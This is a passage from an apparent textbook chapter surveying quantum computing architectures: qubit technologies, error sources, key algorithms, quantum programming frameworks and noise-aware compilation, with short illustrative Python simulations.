constraint for flow-based microfluidic biochips. In: Proceedings of Design Automation Confer-
ence, pp 1–6
Yuh P-H, Yang C-L, Chang Y-W (2008) Bioroute: a network-flow-based routing algorithm for the
synthesis of digital microfluidic biochips. IEEE Trans Comput-Aided Des Integr Circuits Syst
(TCAD) 27(11):1928–1941
Zhu Y, Huang X, Li B, Ho T-Y, Wang Q, Yao H, Wille R, Schlichtmann U, MultiControl: advanced
control logic synthesis for flow-based microfluidic biochips. IEEE Trans Comput-Aided Des
Integr Circuits Syst 39(10):2489–2502
Architectures for Quantum Information
Processing 21
Suryansh Upadhyay, Mahabubul Alam, and Swaroop Ghosh
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 724
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 725
Quantum Bits (Qubits) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 726
Quantum Gates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 727
Quantum Error . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 727
Quantum Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 729
Qubit Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 730
Quantum Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 732
Algorithms Designed for Fault-Tolerant Quantum Computers . . . . . . . . . . . . . . . . . . . . . . . 733
Algorithms for NISQ Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 734
Quantum Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 735
Quantum Program, Quantum Instruction Sets, and Software
Development Kits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 735
Quantum Programming Languages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 736
Quantum Annealing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 738
Compilation, Mapping, and Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 739
Superconducting Quantum Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 740
Trapped-Ion Quantum Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 741
Considerations for Noisy Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743
Technology Agnostic Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743
Superconducting-Specific Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 744
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 746
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 746
Abstract
Quantum computing is changing the way people think about computing. Signifi-
cant strides in research and development for managing and harnessing the power
of quantum systems have been made in recent years, demonstrating the potential
for transformative quantum technology. Quantum phenomena like superposition,
entanglement, and interference can be exploited to solve issues that are difficult
for traditional computers. IBM’s first public access to true quantum computers
through the cloud and Google’s demonstration of quantum supremacy are
among the accomplishments. Besides, a slew of other commercial, government,
and academic projects are in the works to create next-generation hardware, a
software stack to support the hardware ecosystem, and viable quantum algo-
rithms. This chapter covers various quantum computing architectures including
many hardware technologies that are being investigated. It also discusses a
variety of challenges, including numerous errors/noises that plague the quantum
computers. An overview of literature investigating noise-resilience approaches is
also presented.
Keywords
Introduction
Shor's algorithm, one of the most well-known quantum algorithms, can factor an integer into prime numbers exponentially faster than the best-known conventional solution. The impact of this
exponential speedup on encryption and Internet security is substantial. Cirac and
Zoller suggested the experimental implementation of the Controlled NOT (CNOT)
gate (Cirac and Zoller 1995) on the hardware side. Following that, nuclear magnetic
resonance (NMR)-based devices were used to demonstrate quantum computing
hardware, including the first demonstration of a full-fledged quantum algorithm
on a 2-qubit NMR computer at Oxford University. Schoelkopf, Devoret, Girvin,
and colleagues at Yale University invented the superconducting “Transmon” qubit,
which revolutionized qubit technology and paved the road for scalability. IBM first
provided access to a 5-qubit programmable quantum computer through the cloud.
The free access to quantum computers attracted many researchers around the globe
to the world of quantum computing. The quantum threshold theorem (Shor 1994)
demonstrated that if the error rate of each gate is small enough, one can
perform arbitrarily long quantum computations to arbitrarily good precision with
only a small increase in gate count. This shows that quantum computers can be made
fault-tolerant. Especially in the last few years, quantum computing has experienced
breakthroughs across the stack, including algorithm, architecture, and hardware.
The most notable of these is the demonstration of Quantum Supremacy by Google
(Arute et al. 2019). The group of researchers from Google performed a task on a 53-
qubit quantum computer in seconds which arguably would take days on the fastest
classical supercomputer. Application domains of QC now include machine learning,
security, drug discovery, computational quantum chemistry, and optimization.
On the one hand, researchers are proposing new quantum algorithms to speed up
computation, while on the other hand, various technologies like superconducting,
trapped-ion (TI), and photonics are also being studied to design efficient quantum
bits or qubits. Despite all the signs of progress, quantum computers are yet to solve
practical-scale problems.
The quantum computer architecture is essential for the functioning of a quantum
computer. Despite various system optimizations, the performance of a quantum
processor is still severely constrained by the amount of available computational resources. This chapter covers the fundamentals of quantum computing architectures
including some of the most often used hardware architectures and the associated
software stacks. It also discusses the numerous issues that these technologies face,
as well as a literature review of efforts to address these architectural issues for both
hardware and software stacks. Figure 1 illustrates the topics covered in this chapter.
Background
Fig. 2 Bloch sphere representation of state (a) |0⟩ and state (b) |1⟩. (c) Bloch sphere representation of the RY (π/2) gate on state |0⟩
Quantum Gates
Gates are used in quantum computing systems to regulate qubit amplitudes and
execute computations. At any given time, gates can act on one or more qubits. QC
systems often support a set of universal single-qubit and two-qubit gates, similar to
universal gates in classical computing. Quantum gates, unlike classical logic gates, are not physical components; instead, they are realized through the use of pulses. These
gate sets are used to express QC applications. A sequence of gates is executed on a
set of correctly initialized qubits to run a program. The gates change the amplitudes
of the qubits, moving the state space closer to the desired output. Intuitively, the gate
pulses cause distinct rotations along different axes in the Bloch sphere (depending
on pulse amplitude, duration, and shape). For example, the RY (π/2) gate (rotation along the Y-axis) rotates a qubit state by π/2 radians around the Y-axis (e.g., applying an RY (π/2) to a qubit in the |0⟩ state puts it in the superposition state, Fig. 2c).
Mathematically, quantum gates are represented using unitary matrices (a matrix U is unitary if UU† = I, where U† is the adjoint of matrix U and I is the identity matrix). For an n-qubit gate, the dimension of the unitary matrix is 2^n × 2^n. Any unitary matrix can be a quantum gate. However, in existing systems, only a handful of gates are possible, often known as the native gates or basis gates of that quantum processor. For IBM systems, the basis gates are ID, RZ, SX, X, and CNOT. CNOT is the only 2-qubit gate; the others are single-qubit gates. Any non-native gate in a quantum circuit is first decomposed into the native gates; a minimal numerical sketch follows.
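As a purely numerical illustration (independent of any particular quantum SDK), the following sketch builds the RY(θ) matrix, verifies its unitarity, and applies RY(π/2) to the |0⟩ state:

```python
import numpy as np

def ry(theta):
    """Single-qubit rotation around the Y-axis as a 2x2 unitary matrix."""
    c, s = np.cos(theta / 2), np.sin(theta / 2)
    return np.array([[c, -s],
                     [s,  c]])

U = ry(np.pi / 2)
# Unitarity check: U @ U.conj().T should be the 2x2 identity.
assert np.allclose(U @ U.conj().T, np.eye(2))

ket0 = np.array([1.0, 0.0])          # the |0> state
print(U @ ket0)                      # ~[0.707, 0.707]: equal superposition
```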
Quantum Error
Quantum systems are plagued with noise because of the quantum gates being error-
prone. Besides, the qubits suffer from decoherence, i.e., the qubits spontaneously
interact with the environment and lose states. Therefore, the output of a quantum
circuit is erroneous. The deeper quantum circuit needs more time to execute and gets
affected by decoherence. More gates in the circuit also increase the accumulation
of gate error. Parallel gate operations on different qubits can affect each other’s
performance which is known as crosstalk. This section elaborates on these errors:
Gate Error
Quantum gates are realized with pulses, and the pulses can be erroneous. For
example, consider the RY (π/2) gate. Due to variation, the pulse intended for a π/2
rotation may not result in an exact π/2 rotation, and it may under-rotate or over-
rotate, leading to an erroneous logical operation. Such faulty operations manifest as gate errors. For present systems, 2-qubit gate errors (e.g., CNOT error) are an order of magnitude larger than 1-qubit gate errors. A quantum circuit
with a larger number of gates will accrue more gate faults, lowering the quantum
program’s reliability. Hence, compilation and error-tolerant mapping have the goal
of reducing the number of gates in the quantum circuit.
Measurement Error
Reading out a qubit containing a state 1 may result in a state 0 and vice versa due to
readout error; this arises due to measuring circuitry imperfections. The readout error
probability can be quantified using a simple technique. It entails preparing a qubit in
all binary states (i.e., 0 and 1 for a single qubit) and reading it out (both preparation
and measurement multiple times). The qubits on IBM machines are initially set to
0 states by default. Therefore, to prepare state “1,” a quantum-NOT (X) gate has
to be applied to the |0⟩ state. Ideally, if the process of preparing a state 0 or 1 and
reading out N times is repeated, it should generate 0 or 1 all the time. However, due
to readout error, a flipped bit might be read in some of the cases. For example, say
state 0 is prepared and measured 1000 times. Out of these 1000 trials, 900 times it
reads out 0, and other 100 times it reads out 1. Thus, measurement error rate M01
will be 100/1000 = 0.1 (Mxy stands for probability of reading out state “y,” while
the prepared state is “x”; thus, M00 = 900/1000 = 0.90). For multi-qubit readout
characterization, the same protocol applies. However, the number of binary states
that need to be prepared and read will be higher. For example, to characterize a
3-qubit system, 2^3 = 8 binary states (000, 001, 010, . . . , 110, and 111) need to be
prepared and measured (each N-times). Unlike gate error and decoherence, which
depend on the number of gates in the circuit, readout error is gate count agnostic.
It solely depends on the state being read.
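The characterization protocol above can be sketched as follows; the measurement counts are synthetic stand-ins for data that would come from repeated state preparation and readout on hardware.

```python
# Estimate readout error rates M[x][y] = P(read y | prepared x) from counts.
# The counts below are synthetic; on hardware they would come from preparing
# each basis state N times and measuring it.
def readout_matrix(counts):
    M = {}
    for prepared, outcomes in counts.items():
        total = sum(outcomes.values())
        M[prepared] = {read: n / total for read, n in outcomes.items()}
    return M

counts = {
    "0": {"0": 900, "1": 100},   # prepared |0>, read back 1000 times
    "1": {"0": 50, "1": 950},    # prepared |1> (via an X gate), read back
}
M = readout_matrix(counts)
print(M["0"]["1"])   # M01 = 0.1, as in the example above
print(M["0"]["0"])   # M00 = 0.9
```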
Crosstalk Error
Crosstalk is another kind of error present in the near-term quantum computers. The
effect of a gate operation on one qubit should, in theory, be unaffected by what
happens on other qubits. Pulses are used to create quantum gates. However, the gate
pulse intended for one qubit can accidentally excite an unwanted qubit, which is
known as “crosstalk.” Crosstalk may cause conditional dependence in gate errors.
As a result, the gate error of a single gate operation may differ from the gate error
of a parallel gate operation. According to Murali et al. (2020a), the gate error with
another operation running in parallel can be 2X–3X higher than with an isolated
gate operation.
Quantum Hardware
Having introduced quantum computing basics in the prior section, this section
focuses on the various hardware technologies and developments (Fig. 4).
Fig. 4 (a) A two-trap TI system with three qubits each. (b) Coupling graph for ibmq_lima
superconducting device
Qubit Technologies
Superconducting Qubits
Superconductors allow an electrical current to flow with no resistance when cooled
to very low temperatures. Electrical circuits based on superconductors that behave
like qubits can be designed. The idea is to build an anharmonic oscillator. In an
anharmonic oscillator, the energy separation between states is different. Therefore,
the lowest two energy states are used as a qubit. For harmonic oscillators, the
energy states are equally separated, which makes it difficult to control interstate
transition. Superconducting qubits are fabricated by connecting a capacitor and a
superconducting Josephson junction (JJ) in parallel. This assembly works as an
anharmonic LC oscillator in which the Josephson junction works as a nonlinear
inductor. The JJ requires ultralow temperature for it to operate in the superconduct-
ing regime. Thus, superconducting qubits are usually hosted inside large dilution
refrigerators. Kjaergaard et al. (2020) gives a comprehensive overview of the
current state of play for superconducting qubits. Prominent companies conducting
research in superconducting quantum computing are Google, Rigetti, IMEC, BBN
Technologies, Intel, and IBM. According to Li et al. (2021), quantum software and
hardware systems should be designed collaboratively in order to fully exploit the
potential of quantum computing. They review several architectural design works.
One of them is developing a superconducting quantum processor architecture for a
specific program in order to achieve a high yield rate with a low mapping overhead.
The proposed architecture design flow is depicted in Fig. 5. They divided the design
of a superconducting quantum processor architecture into three key subroutines:
layout design, bus selection, and frequency allocation. Each subroutine targets a
different hardware component or configuration, incorporating profiling results and
Fig. 5 Overview of quantum application-specific architecture design flow. (Adopted from Li et al.
2021)
physical constraints. They focus on the qubit placement in the layout design and
try to make those qubit pairs with more two-qubit gates between them nearby to
reduce the mapping overhead. The bus selection subroutine then determines how
the physical qubits are linked. According to the profiling information, they only add
qubit connections (also known as qubit buses) to the locations that are expected to
reduce the mapping overhead the most. Finally, the frequency allocation function
will assign frequencies to all physical qubits that have been placed. By attempting to eliminate frequency-collision scenarios on the created architecture, the subroutine increases the final yield rate.
Trapped-Ion Qubits
Another way of realizing a qubit is by using the energy levels of electrons in neutral
atoms or ions. In their natural state, these electrons occupy the lowest possible
energy levels. Lasers are used to “excite” them to a higher energy level and can
assign the qubit values based on their energy state. Trapped-ion QC system is
implemented by trapping ionized atoms like Yb or Ca between electrodes using
electromagnetic fields (Wright et al. 2019). The logical |0⟩ and |1⟩ are encoded as internal
states such as hyperfine or Zeeman states of the ions. Qubits are stored in stable
electronic states of each ion, and quantum information can be transferred through
the collective quantized motion of the ions in a shared trap (interacting through the
Coulomb force). Figure 4a illustrates various components of a 2-trap TI system.
The ions are organized in the form of an ion chain inside a trap. Trap capacity
is the maximum number of ions that a trap can accommodate. The traps are
connected by a shuttle path which allows movement (shuttle) of an ion from one
trap to another if needed. Prominent companies conducting research in trapped-
ion quantum computing are IonQ, Honeywell, Alpine Quantum Technologies, and
Universal Quantum. TI systems typically employ a single trap design, which has
significant scaling issues. A modular design known as the quantum charge-coupled
device (QCCD) has been proposed (Murali et al. 2020b) to advance toward the next
significant milestone of 50–100 qubit TI devices. Small traps are coupled by ion
shuttling in a QCCD-based TI system. The authors conduct an intensive application-
driven architecture analysis to evaluate the major design choices of trap size,
communication topology, and operation implementation methodologies in order to
realize QCCD-based TI systems with 50–100 qubits. They show that trap sizing
and communication topology decisions can affect application dependability by up
to three orders of magnitude using several applications as benchmarks and several
hardware design points. Another approach to design a hardware architecture for TI
systems is discussed in Wu et al. (2021). The authors propose adopting “TILT”
(Fig. 6), a linear “Turing machine-like” architecture with a multi-laser control
“head” in which a linear chain of ions moves back and forth under the laser head,
as a building block to extend previous scalable trapped-ion quantum computing
approaches. They claim that TILT can significantly decrease communication when
compared to quantum charge-coupled device (QCCD) systems of comparable size.
The principle behind a TILT design is that operations are only done to ions in the
Fig. 6 A quantum computer architecture based on trapped ions and linear tapes. Acousto-optic
modulators (AOMs) aim laser beams onto ions in the execution zone to perform quantum
operations. The entire ion chain is translated until the target qubit is relocated into the execution
zone in order to execute gate operations on the other qubits. (Adopted from Wu et al. 2021)
execution zone toward the center of the trap, and the chain is moved back and forth
to allow for long-range interactions. The complex shuttling primitives of a quantum
charge-coupled device (QCCD) design are hence not required for such a machine.
Spin Qubits
Controlling the spin of charge carriers (electrons and electron holes) in semicon-
ductor devices can also be used to implement a qubit (Chatterjee et al. 2021).
The majority of quantum particles act like tiny magnets. Spin is the name for this
characteristic. The spin orientation is either entirely up or fully down, never halfway
up or down. A spin qubit is created by combining these two states. Local depletion
of two-dimensional electron gases in semiconductors such as gallium arsenide,
silicon, and germanium has been used to create spin qubits. Some reports also show
implementation in graphene (Trauzettel et al. 2007).
Quantum Algorithms
The initial quantum computing algorithms were developed with an ideal quantum
computer in mind, with the quantum gate model studied largely without noise.
Nielsen and Chuang (2002) is the canonical reference for this wave of quantum
algorithm development, and it remains a reliable reference for the theoretical basis
of quantum computing and quantum information to this day. The best-known
algorithms are Shor’s algorithm for factoring and Grover’s algorithm for searching
an unstructured database or an unordered list.
Shor’s Algorithm
Shor’s algorithms describe two quantum algorithms for integer factoring and
discrete logarithm exponentially faster than the best-known classical algorithms
(Shor 1994). Because of the apparent speedup compared to classical algorithms
and the implications of this speedup for known applications, it is a notable and
celebrated scientific contribution to quantum computing. Shor’s algorithms take
advantage of both quantum parallelism and entanglement. There are two sections to
the algorithm. The first portion of the algorithm converts the factoring problem into a
problem of determining a function’s period and can be implemented in a traditional
way. The quantum speedup is determined by the second portion, which uses the
quantum Fourier transform to find the period. Essentially, the paper Shor (1994)
shows that the factoring problem is equivalent to the problem of finding the period in
a sequence of numbers, although a sequence whose length is exponential in the number of bits of the number to be factored. Thus, while
this equivalency does not provide any help in solving the problem on a classical
computer (since it would need to generate this sequence of 2n numbers for an n-bit
number to factor, which would take an exponential amount of time), it is a perfect
problem for a quantum computer as it can be encoded into merely n qubits and
generated in a time that is polynomial in n. Once that sequence is generated, the
QFT can be used to find the period. Shor’s method, if implemented on a perfect
quantum computer, would allow the secret key of the most frequently used public
key cryptosystem, RSA, to be computed, meaning that public key encryption might
be readily broken.
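To make the reduction concrete, the sketch below performs the classical part of Shor's factoring for a toy modulus, finding the period by brute force where a quantum computer would use the QFT; the choice N = 15, a = 7 is purely illustrative.

```python
from math import gcd

# Classical skeleton of Shor's factoring reduction: factor N by finding the
# period r of f(x) = a^x mod N. Here the period is found by brute force;
# on a quantum computer this step is replaced by the QFT-based period finder.
def factor_via_period(N, a):
    assert gcd(a, N) == 1, "a must be coprime to N"
    r, y = 1, a % N
    while y != 1:              # smallest r with a^r = 1 (mod N)
        y = (y * a) % N
        r += 1
    if r % 2:                  # odd period: pick another a in practice
        return None
    x = pow(a, r // 2, N)
    if x == N - 1:             # trivial square root: pick another a
        return None
    return gcd(x - 1, N), gcd(x + 1, N)

print(factor_via_period(15, 7))   # -> (3, 5): period r = 4
```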
Grover’s Algorithm
Grover’s algorithm also known as the quantum search algorithm was introduced by
Lov Grover
√ in (1996). It is used for searching an unsorted database with N entries
in O( N ) time and using O(logN) storage space. Searching an unsorted database
traditionally involves a linear
√ search, which takes O(N) time. Grover’s technique, on
the other hand, takes O( N) time and is the fastest quantum algorithm for doing so.
Unlike other quantum algorithms, which can provide exponential speedup over their
classical equivalents, it delivers a quadratic speedup. When N is big, even quadratic
speedup is significant. It may also be used to calculate the mean and median of a
group of values, as well as to solve the collision problem. It can also be used to tackle
NP-complete problems by doing exhaustive searches across all feasible solutions.
This would result in a significant speedup as compared to traditional techniques.
Grover’s algorithm can also be applied to speed up broad classes of algorithms.
Grover’s algorithm is probabilistic like all quantum algorithms, in the sense that
it gives the correct answer with high probability. The probability of failure can be
decreased by repeating the algorithm.
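The effect of Grover iterations can be illustrated with a small state-vector simulation; the 3-qubit search space and the marked item below are arbitrary choices.

```python
import numpy as np

# State-vector simulation of Grover search over N = 8 items (3 qubits).
# Each iteration = oracle (flip marked amplitude) + inversion about the mean.
N, marked = 8, 5
state = np.full(N, 1 / np.sqrt(N))               # uniform superposition
iterations = int(round(np.pi / 4 * np.sqrt(N)))  # ~O(sqrt(N)) iterations

for _ in range(iterations):
    state[marked] *= -1                     # oracle phase flip
    state = 2 * state.mean() - state        # diffusion (inversion about mean)

probs = state ** 2
print(probs[marked])        # ~0.945: marked item dominates after 2 iterations
```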
The near-term quantum devices have limited number of qubits. Moreover, they
suffer from various types of noises (decoherence, gate errors, measurement errors,
crosstalk, etc.). Due to these constraints, these machines are not yet fully capable
of executing quantum algorithms requiring high orders of error correction (such
as Shor’s factorization or Grover’s search). However, algorithms such as quantum
approximate optimization algorithm (QAOA), Variational Quantum Eigensolver
(VQE) promises to achieve quantum advantage with near-term machines because
they are based on a variational principle that does not necessitate error correction.
Most of these approaches utilize a conventional computer to perform an optimiza-
tion procedure using information extracted from the quantum device, usually in an
iterative fashion. These quantum optimization methods have been applied to diverse
areas such as quantum machine learning.
In VQE, the problem of interest is split into a series of smaller subproblems that can be estimated independently, with the sum of all outputs corresponding to the approximate solution of interest. The process is repeated until a heuristic stopping criterion is met, which is usually equivalent to reaching an energy threshold.
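A minimal sketch of such a hybrid quantum-classical loop is shown below. The "quantum" expectation is replaced by its analytic value ⟨Z⟩ = cos θ for a one-parameter RY(θ)|0⟩ ansatz; on hardware this number would be estimated from repeated measurements.

```python
import numpy as np

# Hybrid variational loop: the "quantum" expectation below is the analytic
# <Z> of the one-parameter ansatz RY(theta)|0>; on hardware it would be
# estimated from repeated measurements of the prepared state.
def expectation(theta):
    return np.cos(theta)

theta, lr = 0.1, 0.2
for step in range(200):
    # Parameter-shift rule: d<Z>/dtheta = (E(t + pi/2) - E(t - pi/2)) / 2
    grad = (expectation(theta + np.pi / 2)
            - expectation(theta - np.pi / 2)) / 2
    theta -= lr * grad                     # classical gradient-descent update

print(theta, expectation(theta))           # theta -> pi, <Z> -> -1 (minimum)
```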
Quantum Software
The work published by Bettina Heim and group provides an overview of Q#, Qiskit,
Cirq, Quipper, and Scaffold as well as the tools/ecosystems that surround them,
and how they have served as a foundation for current and future work (Heim et al.
2020). Q# is a hardware-agnostic quantum programming language designed to
enable the execution of large-scale applications on future quantum hardware (Svore
et al. 2018). As a result, rather than following the imperative style encouraged
by assembly-like languages, Q# focuses on providing high-level abstractions that
facilitate reasoning about the intended functionality. It is notable for its support
for expressing arbitrary classical control flow. This is in contrast to other quantum
programming languages, where this capability is frequently provided by a classical
host language. Unlike other quantum programming languages geared toward formal
verification, qubits in Q# are treated like any other data type. The associated
libraries, the Q# compiler, and all other components of the quantum development
kit are open source. OpenQASM is a quantum program intermediate representation
based on gates (Cross et al. 2017). It expresses quantum programs as lists of
instructions, which are frequently intended to be consumed directly by a quantum
processor. OpenQASM supports abstractions in the form of quantum gates, which
can be built in a hierarchical fashion using a set of intrinsic primitives assumed
to be available on the targeted processor, for example, a Toffoli gate made up of
CNOT gates, T gates, and H gates. In addition, OpenQASM supports single-qubit
measurement and basic classical control operations. Qiskit provides a Python-based
programming environment for creating and manipulating OpenQASM programs
(Treinish et al. 2019). It includes extensive simulation capabilities, such as state
vector and density matrix simulators that can be run on both CPUs and GPUs, in
addition to support for execution on quantum processors. As a result, it allows users
to simulate the effects of noise defined by any custom model, including arbitrary
Kraus operators. The online documentation (Qiskit documentation), which includes
tutorials and is generated for each release, provides a good overview of the full
range of capabilities included in Qiskit. Cirq is a Python quantum programming
library that focuses on supporting near-term quantum hardware. Cirq’s primary goal
is to enable the development of quantum programs capable of running on quantum
computers available now or in the near future that lack error correction (NISQ
hardware) and are subject to certain device topologies. It includes mechanisms for
fine-tuning how a quantum program executes on the specified quantum hardware,
as well as tools for simulating hardware constraints such as noise limitations or the
physical layout of the qubits (Cirq documentation). In contrast to other languages where qubits can be allocated dynamically, layout in Cirq is done manually. Cirq is embedded in Python, so Python's control flow constructs, such as if statements and while loops, can be used to build a circuit before execution. Cirq includes device models for
many of Google’s quantum processors (Cirq documentation), such as Bristlecone
and Sycamore.
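A minimal sketch of these points, assuming only the public Cirq API, is shown below: qubits are laid out explicitly on a grid, ordinary Python control flow assembles the circuit, and the built-in simulator executes it.

```python
import cirq

# Layout is explicit in Cirq: choose grid qubits matching a device topology
qubits = [cirq.GridQubit(0, col) for col in range(3)]

circuit = cirq.Circuit()
circuit.append(cirq.H(qubits[0]))
# Ordinary Python control flow builds the circuit before execution
for a, b in zip(qubits, qubits[1:]):
    circuit.append(cirq.CNOT(a, b))
circuit.append(cirq.measure(*qubits, key="m"))

# Execute on Cirq's built-in simulator
result = cirq.Simulator().run(circuit, repetitions=1000)
print(result.histogram(key="m"))  # counts concentrated on |000> and |111>
```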
Quipper is a circuit description language, which means it can be used to
construct circuits by applying gates on qubits in an organized manner. The circuits
themselves are data that can be provided to functions in the host language Haskell
for circuit optimization, resource estimation, or error correction, for example.
Prototypical implementations of Quipper-like languages, such as Proto-Quipper-S
(Ross 2015), Proto-Quipper-M (Rios and Selinger 2017), and Proto-Quipper-D
(Fu et al. 2020), have evolved with the purpose of enforcing quantum-specific properties such as the no-cloning theorem of quantum information. Scaffold is a stand-
alone programming language. It is intended to be similar to existing traditional
programming languages, like C: Scaffold uses the imperative programming model
of C, as well as many of its recognizable features such as functions (called modules
in Scaffold), if statements, loops, structures, and pre-processor directives (Abhari
et al. 2012). Scaffold programs can also automatically convert conventional functions into reversible logic, implemented using quantum gates, and then incorporate them as oracles in a larger quantum algorithm (Abhari et al. 2012). Intel recently demonstrated its Intel Quantum SDK at IEEE Quantum Week 2022, held in Colorado, USA. It provides developers with tools to help them learn how to program quantum algorithms. It is based on the C++ programming language and
uses the LLVM intermediate level description from classical computing as a base.
It is designed to work with hybrid classical/quantum variational algorithms and
will be compatible with other components of Intel’s quantum stack, such as high-
performance quantum simulators and, eventually, Intel’s spin-qubit-based quantum
processor. The beta version is accessible via the Intel Developer Cloud.
Other quantum programming languages and open-source software frameworks
include Forest/PyQuil (Smith et al. 2016), ProjectQ (Steiger et al. 2018), QWIRE
(Green et al. 2013), staq (Staq-GitHub), Strawberry Fields (Strawberry fields), tket
(tket-GitHub), XACC (McCaskey et al. 2020), and QuTiP (Qutip documentation).
Quantum Compilation
Quantum compilation bridges the gap between the computing layer of high-level
quantum algorithms and the layer of physical qubits with their specific properties
and constraints. Quantum circuit optimization is an essential component of the
quantum computing toolchain. Many noisy intermediate-scale quantum (NISQ) devices provide only sparse connectivity between qubits, which means that a valid quantum circuit frequently requires swapping physical qubits to satisfy adjacency requirements. Optimizing circuits to reduce such swaps and other parameters is
critical for using quantum hardware in the near future. A significant family of
optimal synthesis algorithms functions by completely enumerating all circuits and
returning the lowest cost circuit that can do the specified computation; this technique
is known as exhaustive or brute-force searching. This method is quite popular in the
circuit synthesis community for optimally decomposing small, frequently used gates or functions into the target gate set, and it can be very effective in these modest instances. Shende et al. (2002) synthesized all minimal gate count circuits for
reversible functions on 3 bits using a breadth-first search over the gate set X, CNOT,
TOF (Toffoli). While breadth-first searches are prevalent in reversible circuit synthesis, the
lack of efficient unitary representations complicates such approaches. Fowler (2011)
avoided this issue by conducting the breadth-first search directly, that is, without
the assistance of a pre-computed database with efficient lookup. Non-search-based
synthesis has been utilized in quantum computing on occasion. Kliuchnikov et al.
(2012) in particular provide an approach for decomposing an arbitrary single-qubit
unitary. The earlier described algorithms were largely concerned with lowering
gate counts, and any depth reduction was a byproduct of that. However, when
there are many computational resources available, it can frequently make sense to
raise complexity in order to parallelize operations to take advantage of the extra
resources, as in classical computing. Broadbent and Kashefi (2009) develop an algorithm for translating
quantum circuits to a pattern (a computation in the measurement-based model) that
adds a number of additional ancillas linear in the number of gates. Mapping refers
to assigning logical qubits to the physical qubits of the hardware.
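As a concrete, deliberately simplified illustration of this step (a hypothetical greedy routine for a linear topology, not any specific published algorithm), SWAPs can be inserted until every two-qubit gate acts on adjacent physical qubits:

```python
# Hypothetical greedy SWAP insertion for a 1D (linear) coupling map.
def route_on_line(two_qubit_gates, mapping):
    """Insert SWAPs so every 2-qubit gate acts on adjacent physical qubits.
    mapping: logical qubit name -> physical position on the line."""
    ops = []
    pos = dict(mapping)
    for a, b in two_qubit_gates:
        # Move qubit a one step toward b until they are neighbors
        while abs(pos[a] - pos[b]) > 1:
            step = 1 if pos[b] > pos[a] else -1
            neighbor = next(q for q, p in pos.items() if p == pos[a] + step)
            ops.append(("SWAP", a, neighbor))
            pos[a], pos[neighbor] = pos[neighbor], pos[a]
        ops.append(("CNOT", a, b))
    return ops

print(route_on_line([("q0", "q2")], {"q0": 0, "q1": 1, "q2": 2}))
# -> [('SWAP', 'q0', 'q1'), ('CNOT', 'q0', 'q2')]
```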
In the following sections, mapping and optimization specifically for superconducting and trapped-ion quantum computers are discussed.
Shuttle Operation
A major hurdle in realizing large TI systems is confining many ions in a single trap, as this decreases the spacing between ions and makes it challenging to selectively pulse a qubit using laser controllers. Moreover, the gate time becomes slower, which results in longer program execution time. Therefore, a pathway to scalability is to distribute ions over multiple smaller traps and shuttle ions between traps when a gate spans two traps.
A noise-aware mapping policy ensures that the compiler chooses a routing path with fewer erroneous links.
In Ash-Saki et al. (2019), the authors present QURE, which intelligently schedules gate operations onto less noisy qubits, resulting in better fidelity of the output state.
They propose two approaches: (a) isomorphic subgraph (ISG) search and (b) greedy,
to find a better allocation of program (logical) qubits to hardware (physical) qubits.
The ISG search approach starts with an optimal-depth version of a quantum circuit and systematically checks multiple isomorphic subgraphs. Each
subgraph is given an approximate success probability, and the subgraph with the
highest success probability is chosen to execute the circuit. Through rigorous simulations using a model of a noisy quantum system and experiments on IBM's real quantum device, they demonstrated that QURE can improve the correct output probability, or fidelity, by a large margin without incurring any physical or circuit-level overhead.
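The subgraph-ranking idea reduces to multiplying per-operation success rates. The sketch below is illustrative only: the allocations and error rates are invented, whereas a real flow would derive them from device calibration data.

```python
# Hypothetical estimated-success-probability (ESP) ranking: multiply the
# success rates of every operation a candidate allocation would execute.
def esp(ops, error_rate):
    p = 1.0
    for op in ops:
        p *= 1.0 - error_rate[op]   # success probability of one operation
    return p

# Two candidate allocations (e.g., isomorphic subgraphs) with assumed
# per-qubit and per-link error rates
ops_a = ["q0", ("q0", "q1"), "q1"]
err_a = {"q0": 0.001, "q1": 0.002, ("q0", "q1"): 0.02}
ops_b = ["q2", ("q2", "q3"), "q3"]
err_b = {"q2": 0.001, "q3": 0.001, ("q2", "q3"): 0.01}

# Choose the allocation with the higher estimated success probability
print(esp(ops_a, err_a), esp(ops_b, err_b))
```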
Superconducting-Specific Work
Crosstalk Mitigation
